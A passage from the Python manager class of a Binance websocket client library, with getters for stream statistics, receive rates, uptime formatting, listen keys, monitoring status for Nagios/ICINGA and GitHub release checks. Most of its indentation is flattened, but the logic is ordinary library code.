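# fixed-width table rows of print_summary() and print_stream_info(). Assuming a manager instance
# `ubwa`, a row could be composed like this:
#
#     row = ubwa.fill_up_space_right(17, "btcusdt@trade") + "|" + \
#           ubwa.fill_up_space_left(8, 42) + "|" + \
#           ubwa.fill_up_space_centered(11, "running")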
def get_active_stream_list(self):
"""
Get a list of all active streams
:return: dict or False
"""
# get the stream_list without stopped and crashed streams
stream_list_with_active_streams = {}
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
stream_list_with_active_streams[stream_id] = self.stream_list[stream_id]
try:
    if len(stream_list_with_active_streams) > 0:
        return stream_list_with_active_streams
    else:
        return False
except KeyError:
    return False
except UnboundLocalError:
    return False
def get_all_receives_last_second(self):
"""
Get the number of all receives of the last second
:return: int
"""
all_receives_last_second = 0
last_second_timestamp = int(time.time()) - 1
for stream_id in self.stream_list:
try:
all_receives_last_second += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][
last_second_timestamp]
except KeyError:
pass
return all_receives_last_second
def get_binance_api_status(self):
"""
`get_binance_api_status()` is obsolete and will be removed in future releases, please use `get_used_weight()`
instead!
:return: dict
"""
logger.warning("`get_binance_api_status()` is obsolete and will be removed in future releases, please use "
"`get_used_weight()` instead!")
return self.binance_api_status
def get_debug_log(self):
"""
Get the debug log string.
:return: str
"""
if self.debug:
debug_msg = f" - called by {str(traceback.format_stack()[-2]).strip()}"
else:
debug_msg = ""
return debug_msg
def get_used_weight(self):
"""
Get used_weight, last status_code and the timestamp of the last status update
:return: dict
"""
return self.binance_api_status
def get_current_receiving_speed(self, stream_id):
"""
Get the receiving speed of the last second in Bytes
:param stream_id: id of a stream
:type stream_id: str
:return: int
"""
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp] > 0:
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = \
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp]
except TypeError:
return 0
except KeyError:
return 0
try:
current_receiving_speed = self.stream_list[stream_id]['transfer_rate_per_second']['speed']
except KeyError:
current_receiving_speed = 0
return current_receiving_speed
def get_current_receiving_speed_global(self):
"""
Get the receiving speed of the last second in Bytes from all streams!
:return: int
"""
current_receiving_speed = 0
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
except TypeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - TypeError: "
f"{str(error_msg)}")
return 0
for stream_id in temp_stream_list:
current_receiving_speed += self.get_current_receiving_speed(stream_id)
return current_receiving_speed
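# Usage sketch (illustrative comment, assuming a manager instance `ubwa` with running streams):
#
#     speed = ubwa.get_current_receiving_speed_global()
#     print(f"currently receiving {ubwa.get_human_bytesize(speed, '/s')} over all streams")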
@staticmethod
def get_date_of_timestamp(timestamp):
"""
Convert a timestamp into a readable date/time format for humans
:param timestamp: provide the timestamp you want to convert into a date
:type timestamp: timestamp
:return: str
"""
date = str(datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC'))
return date
def get_errors_from_endpoints(self):
"""
Get all the stored error messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_error
def get_event_loop_by_stream_id(self, stream_id: Optional[Union[str, bool]] = False) -> bool:
"""
Get the asyncio event loop used by a specific stream.
:return: asyncio event loop or False
"""
if stream_id is False:
return False
else:
try:
return self.event_loops[stream_id]
except KeyError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_event_loop_by_stream_id() - KeyError - {str(error_msg)}")
return False
def get_exchange(self):
"""
Get the name of the used exchange like "binance.com" or "binance.org-testnet"
:return: str
"""
return self.exchange
@staticmethod
def get_human_bytesize(bytes, suffix=""):
"""
Convert the bytes to something readable
:param bytes: amount of bytes
:type bytes: int
:param suffix: add a string after
:type suffix: str
:return: str
"""
if bytes > 1024 * 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024 * 1024), 3)) + " tB" + suffix
elif bytes > 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024), 2)) + " gB" + suffix
elif bytes > 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024), 2)) + " mB" + suffix
elif bytes > 1024:
bytes = str(round(bytes / 1024, 2)) + " kB" + suffix
else:
bytes = str(bytes) + " B" + suffix
return bytes
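# Illustrative examples (comment only) of the rounding and unit selection above:
#
#     BinanceWebSocketApiManager.get_human_bytesize(512)                   # -> "512 B"
#     BinanceWebSocketApiManager.get_human_bytesize(1337000)               # -> "1.28 mB"
#     BinanceWebSocketApiManager.get_human_bytesize(1337000, suffix="/s")  # -> "1.28 mB/s"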
@staticmethod
def get_human_uptime(uptime):
"""
Convert a timespan of seconds into hours, days, ...
:param uptime: Uptime in seconds
:type uptime: int
:return: str
"""
if uptime > (60 * 60 * 24):
uptime_days = int(uptime / (60 * 60 * 24))
uptime_hours = int(((uptime - (uptime_days * (60 * 60 * 24))) / (60 * 60)))
uptime_minutes = int((uptime - ((uptime_days * (60 * 60 * 24)) + (uptime_hours * 60 * 60))) / 60)
uptime_seconds = int(
uptime - ((uptime_days * (60 * 60 * 24)) + ((uptime_hours * (60 * 60)) + (uptime_minutes * 60))))
uptime = str(uptime_days) + "d:" + str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(
int(uptime_seconds)) + "s"
elif uptime > (60 * 60):
uptime_hours = int(uptime / (60 * 60))
uptime_minutes = int((uptime - (uptime_hours * (60 * 60))) / 60)
uptime_seconds = int(uptime - ((uptime_hours * (60 * 60)) + (uptime_minutes * 60)))
uptime = str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(int(uptime_seconds)) + "s"
elif uptime > 60:
uptime_minutes = int(uptime / 60)
uptime_seconds = uptime - uptime_minutes * 60
uptime = str(uptime_minutes) + "m:" + str(int(uptime_seconds)) + "s"
else:
uptime = str(int(uptime)) + " seconds"
return uptime
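# Illustrative examples (comment only):
#
#     BinanceWebSocketApiManager.get_human_uptime(42)      # -> "42 seconds"
#     BinanceWebSocketApiManager.get_human_uptime(3725)    # -> "1h:2m:5s"
#     BinanceWebSocketApiManager.get_human_uptime(90061)   # -> "1d:1h:1m:1s"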
@staticmethod
def get_latest_release_info():
"""
Get info about the latest available release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/releases/latest')
latest_release_info = respond.json()
return latest_release_info
except Exception:
return False
@staticmethod
def get_latest_release_info_check_command():
"""
Get info about the latest available `check_lucit_collector` release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/LUCIT-Development/check_lucit_collector.py/'
'releases/latest')
return respond.json()
except Exception:
return False
def get_latest_version(self):
"""
Get the version of the latest available release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or the last timestamp is older than 1 hour
if self.last_update_check_github['status'] is None or \
(self.last_update_check_github['timestamp']+(60*60) < time.time()):
self.last_update_check_github['status'] = self.get_latest_release_info()
if self.last_update_check_github['status']:
try:
return self.last_update_check_github['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_latest_version_check_command(self):
"""
Get the version of the latest available `check_lucit_collector.py` release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or the last timestamp is older than 1 hour
if self.last_update_check_github_check_command['status'] is None or \
(self.last_update_check_github_check_command['timestamp'] + (60 * 60) < time.time()):
self.last_update_check_github_check_command['status'] = self.get_latest_release_info_check_command()
if self.last_update_check_github_check_command['status']:
try:
return self.last_update_check_github_check_command['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_limit_of_subscriptions_per_stream(self):
"""
Get the number of allowed active subscriptions per stream (limit of the Binance API)
:return: int
"""
return self.max_subscriptions_per_stream
def get_number_of_all_subscriptions(self):
"""
Get the number of all stream subscriptions
:return: int
"""
subscriptions = 0
try:
active_stream_list = copy.deepcopy(self.get_active_stream_list())
if active_stream_list:
for stream_id in active_stream_list:
subscriptions += active_stream_list[stream_id]['subscriptions']
self.all_subscriptions_number = subscriptions
except TypeError:
return self.all_subscriptions_number
except RuntimeError:
return self.all_subscriptions_number
return subscriptions
def get_number_of_free_subscription_slots(self, stream_id):
"""
Get the number of free subscription slots (max allowed subscriptions - subscriptions) of a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: int
"""
free_slots = self.max_subscriptions_per_stream - self.stream_list[stream_id]['subscriptions']
return free_slots
def get_listen_key_from_restclient(self, stream_id, api_key, api_secret, symbols=False):
"""
Get a new or cached (<30m) listen_key
:param stream_id: provide a stream_id
:type stream_id: str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
try:
if (self.stream_list[stream_id]['start_time'] + self.stream_list[stream_id]['listen_key_cache_time']) > \
time.time() or (self.stream_list[stream_id]['last_static_ping_listen_key'] +
self.stream_list[stream_id]['listen_key_cache_time']) > time.time():
# listen_key is not older than 30 min
if self.stream_list[stream_id]['listen_key'] is not False:
response = {'listenKey': self.stream_list[stream_id]['listen_key']}
return response
except KeyError:
logger.debug(f"BinanceWebSocketApiManager.get_listen_key_from_restclient() - KeyError")
return False
# no cached listen_key or listen_key is older than 30 min
# acquire a new listen_key:
response = self.restclient.get_listen_key(stream_id)
if response:
# save and return the valid listen_key
try:
self.stream_list[stream_id]['listen_key'] = str(response['listenKey'])
return response
except KeyError:
# no valid listen_key, but a response from endpoint
return response
except TypeError:
return response
else:
# no valid listen_key
return False
def get_most_receives_per_second(self):
"""
Get the highest total receives per second value
:return: int
"""
return self.most_receives_per_second
def get_number_of_streams_in_stream_list(self):
"""
Get the number of streams that are stored in the stream_list
:return: int
"""
return len(self.stream_list)
def get_number_of_subscriptions(self, stream_id):
"""
Get the number of subscriptions of a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: int
"""
count_subscriptions = 0
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel \
or channel == "orders" \
or channel == "accounts" \
or channel == "transfers" \
or channel == "allTickers" \
or channel == "allMiniTickers" \
or channel == "blockheight":
count_subscriptions += 1
continue
else:
for market in self.stream_list[stream_id]['markets']:
if "!" in market \
or market == "orders" \
or market == "accounts" \
or market == "transfers" \
or market == "allTickers" \
or market == "allMiniTickers" \
or market == "blockheight":
count_subscriptions += 1
else:
count_subscriptions += 1
return count_subscriptions
def get_keep_max_received_last_second_entries(self):
"""
Get how many received_last_second entries are stored till they get deleted
:return: int
"""
return self.keep_max_received_last_second_entries
def get_monitoring_status_icinga(self, check_command_version=False, warn_on_update=True):
"""
Get status and perfdata to monitor and collect metrics with ICINGA/Nagios
status: OK, WARNING, CRITICAL
- WARNING: on restarts, available updates
- CRITICAL: crashed streams
perfdata:
- average receives per second since last status check
- average speed per second since last status check
- total received bytes since start
- total received length since start
- stream_buffer size
- stream_buffer length
- reconnects
- uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Systems-and-Development/check_lucit_collector.py>`_
:type check_command_version: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict (text, time, return_code)
"""
result = self.get_monitoring_status_plain(check_command_version=check_command_version,
warn_on_update=warn_on_update)
if len(result['update_msg']) > 0 or len(result['status_msg']) > 0:
text_msg = " -" + str(result['status_msg']) + str(result['update_msg'])
else:
text_msg = ""
check_message = "BINANCE WEBSOCKETS (" + self.exchange + ") - " + result['status_text'] + ": O:" + \
str(result['active_streams']) + \
"/R:" + str(result['restarting_streams']) + "/C:" + str(result['crashed_streams']) + "/S:" + \
str(result['stopped_streams']) + text_msg + " | " + \
"active streams=" + str(result['active_streams']) + ";;;0 " + \
"average_receives_per_second=" + str(result['average_receives_per_second']) + \
";;;0 current_receiving_speed_per_second=" + str(result['average_speed_per_second']) + \
"KB;;;0 total_received_length=" + str(result['total_received_length']) + "c;;;0 total_" \
"received_size=" + str(result['total_received_mb']) + "MB;;;0 stream_buffer_size=" + \
str(result['stream_buffer_mb']) + "MB;;;0 stream_buffer_length=" + \
str(result['stream_buffer_items']) + ";;;0 reconnects=" + str(result['reconnects']) + "c;;;0 " \
"uptime_days=" + str(result['uptime']) + "c;;;0"
status = {'text': check_message,
'time': int(result['timestamp']),
'return_code': result['return_code']}
return status
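# Usage sketch (illustrative comment): inside a custom Nagios/ICINGA check plugin the returned dict
# can be mapped directly to plugin output and exit code, assuming a manager instance `ubwa`:
#
#     status = ubwa.get_monitoring_status_icinga(warn_on_update=False)
#     print(status['text'])
#     sys.exit(status['return_code'])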
def get_monitoring_status_plain(self, check_command_version=False, warn_on_update=True):
"""
Get plain monitoring status data:
active_streams, crashed_streams, restarting_streams, stopped_streams, return_code, status_text,
timestamp, update_msg, average_receives_per_second, average_speed_per_second, total_received_mb,
stream_buffer_items, stream_buffer_mb, reconnects, uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Systems-and-Development/check_lucit_collector.py>`_
:type check_command_version: False or str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict
"""
result = {}
result['active_streams'] = 0
result['crashed_streams'] = 0
result['restarting_streams'] = 0
result['highest_restart_per_stream_last_hour'] = 0
result['return_code'] = 0
result['status_text'] = "OK"
result['status_msg'] = ""
result['stopped_streams'] = 0
result['timestamp'] = time.time()
result['update_msg'] = ""
time_period = result['timestamp'] - self.last_monitoring_check
timestamp_last_hour = time.time() - (60*60)
try:
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
is_update_available_unicorn_fy = unicorn_fy.is_update_available()
except ModuleNotFoundError:
logger.critical("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy not installed!")
is_update_available_unicorn_fy = False
except AttributeError:
logger.error("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy outdated!")
is_update_available_unicorn_fy = True
if check_command_version:
is_update_available_check_command = self.is_update_availabe_check_command(
check_command_version=check_command_version)
else:
is_update_available_check_command = True
for stream_id in self.stream_list:
stream_restarts_last_hour = 0
for reconnect in self.stream_list[stream_id]['logged_reconnects']:
if reconnect > timestamp_last_hour:
stream_restarts_last_hour += 1
if stream_restarts_last_hour > result['highest_restart_per_stream_last_hour']:
result['highest_restart_per_stream_last_hour'] = stream_restarts_last_hour
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
result['active_streams'] += 1
elif self.stream_list[stream_id]['status'] == "stopped":
result['stopped_streams'] += 1
elif self.stream_list[stream_id]['status'] == "restarting":
result['restarting_streams'] += 1
elif "crashed" in self.stream_list[stream_id]['status']:
result['crashed_streams'] += 1
if self.is_update_available() and is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API, UnicornFy and " \
"check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_available() and is_update_available_unicorn_fy:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and UnicornFy"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_available() and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UnicornFy and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_available():
result['update_msg'] = " Update " + str(self.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy:
result['update_msg'] = " Update UnicornFy " + str(unicorn_fy.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_check_command:
result['update_msg'] = " Update `check_lucit_collector.py` " + \
str(self.get_latest_version_check_command()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
if result['highest_restart_per_stream_last_hour'] >= 10:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
elif result['crashed_streams'] > 0:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
elif result['highest_restart_per_stream_last_hour'] >= 3:
result['status_text'] = "WARNING"
result['return_code'] = 1
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
result['average_receives_per_second'] = ((self.total_receives - self.monitoring_total_receives) /
time_period).__round__(2)
result['average_speed_per_second'] = (((self.total_received_bytes - self.monitoring_total_received_bytes) /
time_period) / 1024).__round__(2)
result['total_received_mb'] = (self.get_total_received_bytes() / (1024 * 1024)).__round__(2)
result['total_received_length'] = self.total_receives
result['stream_buffer_items'] = str(self.get_stream_buffer_length())
result['stream_buffer_mb'] = (self.get_stream_buffer_byte_size() / (1024 * 1024)).__round__(4)
result['reconnects'] = self.get_reconnects()
self.monitoring_total_receives = self.get_total_receives()
self.monitoring_total_received_bytes = self.get_total_received_bytes()
self.last_monitoring_check = result['timestamp']
result['uptime'] = ((result['timestamp'] - self.start_time) / (60*60*24)).__round__(3)
return result
@staticmethod
def get_new_uuid_id() -> str:
"""
Get a new unique uuid in string format. This is used as 'stream_id' or 'socket_id'.
:return: uuid (str)
"""
stream_id = uuid.uuid4()
new_id_hash = hashlib.sha256(str(stream_id).encode()).hexdigest()
new_id = f"{new_id_hash[0:12]}-{new_id_hash[12:16]}-{new_id_hash[16:20]}-{new_id_hash[20:24]}-" \
f"{new_id_hash[24:32]}"
return new_id
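# Illustrative example (comment only): the returned id is a sha256-derived string in an uuid-like
# 12-4-4-4-8 format, e.g.:
#
#     new_id = BinanceWebSocketApiManager.get_new_uuid_id()
#     # new_id -> something like "1a2b3c4d5e6f-1a2b-3c4d-5e6f-1a2b3c4d"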
def get_process_usage_memory(self):
"""
Get the used memory of this process
:return: str
"""
process = psutil.Process(os.getpid())
memory = self.get_human_bytesize(process.memory_info()[0])
return memory
def get_process_usage_cpu(self):
"""
Get the used cpu power of this process
:return: float or False
"""
try:
cpu = psutil.cpu_percent(interval=None)
except OSError as error_msg:
logger.error(f"BinanceWebSocketApiManager.get_process_usage_cpu() - OSError - error_msg: {str(error_msg)}")
return False
return cpu
def get_process_usage_threads(self):
"""
Get the number of threads that this process is using
:return: int
"""
threads = threading.active_count()
return threads
def get_reconnects(self):
"""
Get the number of total reconnects
:return: int
"""
return self.reconnects
def get_request_id(self):
"""
Get a unique `request_id`
:return: int
"""
with self.request_id_lock:
self.request_id += 1
return self.request_id
def get_result_by_request_id(self, request_id=False, timeout=10):
"""
Get the result related to the provided `request_id`
:param request_id: if you run `get_stream_subscriptions()
<https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.get_stream_subscriptions>`_
it returns a unique `request_id` - provide it to this method to receive the result.
:type request_id: int
:param timeout: seconds to wait to receive the result. If it is not received in time, the method returns `False`
:type timeout: int
:return: `result` or False
"""
if request_id is False:
return False
wait_till_timestamp = time.time() + timeout
while wait_till_timestamp >= time.time():
for result in self.ringbuffer_result:
result_dict = json.loads(result)
if result_dict['id'] == request_id:
return result
return False
def get_results_from_endpoints(self):
"""
Get all the stored result messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_result
def get_ringbuffer_error_max_size(self):
"""
Get the maximum number of entries that can be stored in the error ringbuffer
:return: int
"""
return self.ringbuffer_error_max_size
def get_ringbuffer_result_max_size(self):
"""
Get the maximum number of entries that can be stored in the result ringbuffer
:return: int
"""
return self.ringbuffer_result_max_size
def get_start_time(self):
"""
Get the start_time of the BinanceWebSocketApiManager instance
:return: timestamp
"""
return self.start_time
def get_stream_buffer_byte_size(self):
"""
Get the current byte size estimation of the stream_buffer
:return: int
"""
total_received_bytes = self.get_total_received_bytes()
total_receives = self.get_total_receives()
stream_buffer_length = self.get_stream_buffer_length()
try:
    return round(total_received_bytes / total_receives * stream_buffer_length)
except ZeroDivisionError:
    return 0
def get_stream_buffer_length(self, stream_buffer_name=False):
"""
Get the current number of items in all stream_buffer or of a specific stream_buffer
:param stream_buffer_name: Name of the stream_buffer
:type stream_buffer_name: str or stream_id
:return: int
"""
number = 0
if stream_buffer_name:
try:
return len(self.stream_buffers[stream_buffer_name])
except KeyError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_stream_buffer_length() - KeyError - "
f"error_msg: {error_msg}")
return 0
else:
number += len(self.stream_buffer)
for stream_buffer_name in self.stream_buffers:
number += len(self.stream_buffers[stream_buffer_name])
return number
def get_stream_id_by_label(self, stream_label=False):
"""
Get the stream_id of a specific stream by stream label
:param stream_label: stream_label of the stream you search
:type stream_label: str
:return: stream_id or False
"""
if stream_label:
for stream_id in self.stream_list:
if self.stream_list[stream_id]['stream_label'] == stream_label:
return stream_id
return False
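# Usage sketch (illustrative comment, assuming a manager instance `ubwa`): a stream created with a
# `stream_label` can later be found again by that label:
#
#     stream_id = ubwa.create_stream(['trade'], ['btcusdt'], stream_label="btc_trades")
#     # ... somewhere else in the code:
#     same_stream_id = ubwa.get_stream_id_by_label("btc_trades")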
def get_stream_info(self, stream_id):
"""
Get all info about a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: dict or False
"""
current_timestamp = time.time()
try:
temp_stream_list = copy.deepcopy(self.stream_list[stream_id])
except RuntimeError:
logger.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: RuntimeError")
return self.get_stream_info(stream_id)
except KeyError:
logger.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: KeyError")
return False
if temp_stream_list['last_heartbeat'] is not None:
temp_stream_list['seconds_to_last_heartbeat'] = \
current_timestamp - self.stream_list[stream_id]['last_heartbeat']
if temp_stream_list['has_stopped'] is not False:
temp_stream_list['seconds_since_has_stopped'] = \
int(current_timestamp) - int(self.stream_list[stream_id]['has_stopped'])
try:
self.stream_list[stream_id]['processed_receives_statistic'] = self.get_stream_statistic(stream_id)
except ZeroDivisionError:
pass
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = self.get_current_receiving_speed(stream_id)
return temp_stream_list
def get_stream_label(self, stream_id=False):
"""
Get the stream_label of a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: str or False
"""
if stream_id:
return self.stream_list[stream_id]['stream_label']
else:
return False
def get_stream_subscriptions(self, stream_id, request_id=False):
"""
Get a list of subscriptions of a specific stream from Binance endpoints - the result can be received via
the `stream_buffer` and is also added to the results ringbuffer - `get_results_from_endpoints()
<https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.get_results_from_endpoints>`_
to get all results or use `get_result_by_request_id(request_id)
<https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.get_result_by_request_id>`_
to get a specific one!
This function is supported by CEX endpoints only!
Info: https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md#listing-subscriptions
:param stream_id: id of a stream
:type stream_id: str
:param request_id: id to use for the request - use `get_request_id()` to create a unique id. If not provided or
`False`, then this method is using `get_request_id()
<https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.get_request_id>`_
automatically.
:type request_id: int
:return: request_id (int)
"""
if request_id is False:
request_id = self.get_request_id()
if self.is_exchange_type('dex'):
logger.error("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") DEX websockets don't support the listing of subscriptions! Request not "
"sent!")
return False
elif self.is_exchange_type('cex'):
payload = {"method": "LIST_SUBSCRIPTIONS",
"id": request_id}
self.stream_list[stream_id]['payload'].append(payload)
logger.info("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") payload added!")
return request_id
else:
return False
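# Usage sketch (illustrative comment, assuming a manager instance `ubwa` and a running CEX stream
# `stream_id`): combine this method with get_result_by_request_id() to fetch the answer:
#
#     request_id = ubwa.get_stream_subscriptions(stream_id)
#     result = ubwa.get_result_by_request_id(request_id, timeout=10)
#     if result is not False:
#         print(result)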
def get_stream_list(self):
"""
Get a list of all streams
:return: dict
"""
# get the stream list
temp_stream_list = {}
for stream_id in self.stream_list:
temp_stream_list[stream_id] = self.get_stream_info(stream_id)
return temp_stream_list
def get_stream_buffer_maxlen(self, stream_buffer_name=False):
"""
Get the maxlen value of the
`stream_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If maxlen is not specified or is None, `stream_buffer` may grow to an arbitrary length. Otherwise, the
`stream_buffer` is bounded to the specified maximum length. Once a bounded length `stream_buffer` is full, when
new items are added, a corresponding number of items are discarded from the opposite end.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: int or False
"""
if stream_buffer_name is False:
try:
return self.stream_buffer.maxlen
except IndexError:
return False
else:
try:
return self.stream_buffers[stream_buffer_name].maxlen
except IndexError:
return False
except KeyError:
return False
def get_stream_receives_last_second(self, stream_id):
"""
Get the number of receives of a specific stream from the last second
:param stream_id: id of a stream
:type stream_id: str
:return: int
"""
last_second_timestamp = int(time.time()) - 1
try:
return self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_second_timestamp]
except KeyError:
return 0
def get_stream_statistic(self, stream_id):
"""
Get the statistic of a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: dict
"""
stream_statistic = {'stream_receives_per_second': 0,
'stream_receives_per_minute': 0,
'stream_receives_per_hour': 0,
'stream_receives_per_day': 0,
'stream_receives_per_month': 0,
'stream_receives_per_year': 0}
if self.stream_list[stream_id]['status'] == "running":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "stopped":
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif "crashed" in self.stream_list[stream_id]['status']:
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "restarting":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
else:
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
try:
stream_receives_per_second = self.stream_list[stream_id]['processed_receives_total'] / stream_statistic['uptime']
except ZeroDivisionError:
stream_receives_per_second = 0
stream_statistic['stream_receives_per_second'] = stream_receives_per_second
if stream_statistic['uptime'] > 60:
stream_statistic['stream_receives_per_minute'] = stream_receives_per_second * 60
if stream_statistic['uptime'] > 60 * 60:
stream_statistic['stream_receives_per_hour'] = stream_receives_per_second * 60 * 60
if stream_statistic['uptime'] > 60 * 60 * 24:
stream_statistic['stream_receives_per_day'] = stream_receives_per_second * 60 * 60 * 24
if stream_statistic['uptime'] > 60 * 60 * 24 * 30:
stream_statistic['stream_receives_per_month'] = stream_receives_per_second * 60 * 60 * 24 * 30
if stream_statistic['uptime'] > 60 * 60 * 24 * 30 * 12:
stream_statistic['stream_receives_per_year'] = stream_receives_per_second * 60 * 60 * 24 * 30 * 12
return stream_statistic
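# Usage sketch (illustrative comment, assuming a manager instance `ubwa` and a stream_id):
#
#     statistic = ubwa.get_stream_statistic(stream_id)
#     print(f"{statistic['stream_receives_per_second']:.2f} receives/s over "
#           f"{ubwa.get_human_uptime(statistic['uptime'])}")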
def get_total_received_bytes(self):
"""
Get number of total received bytes
:return: int
"""
# how much bytes did we receive till now?
return self.total_received_bytes
def get_total_receives(self):
"""
Get the number of total receives
:return: int
"""
return self.total_receives
def get_user_agent(self):
"""
Get the user_agent string "lib name + lib version + python version"
:return: str
"""
user_agent = f"{self.name}_{str(self.get_version())}-python_{str(platform.python_version())}"
return user_agent
def get_version(self):
"""
Get the package/module version
:return: str
"""
return self.version
def get_version_unicorn_fy(self):
"""
Get the package/module version of `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_
:return: str
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.get_version()
@staticmethod
def help():
"""
Help in iPython
"""
print("Ctrl+D to close")
def increase_received_bytes_per_second(self, stream_id, size):
"""
Add the amount of received bytes per second
:param stream_id: id of a stream
:type stream_id: str
:param size: amount of bytes to add
:type size: int
"""
current_timestamp = int(time.time())
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp]:
pass
except KeyError:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] = 0
try:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] += size
except KeyError:
pass
def increase_processed_receives_statistic(self, stream_id):
"""
Add the number of processed receives
:param stream_id: id of a stream
:type stream_id: str
"""
current_timestamp = int(time.time())
try:
self.stream_list[stream_id]['processed_receives_total'] += 1
except KeyError:
return False
try:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] += 1
except KeyError:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
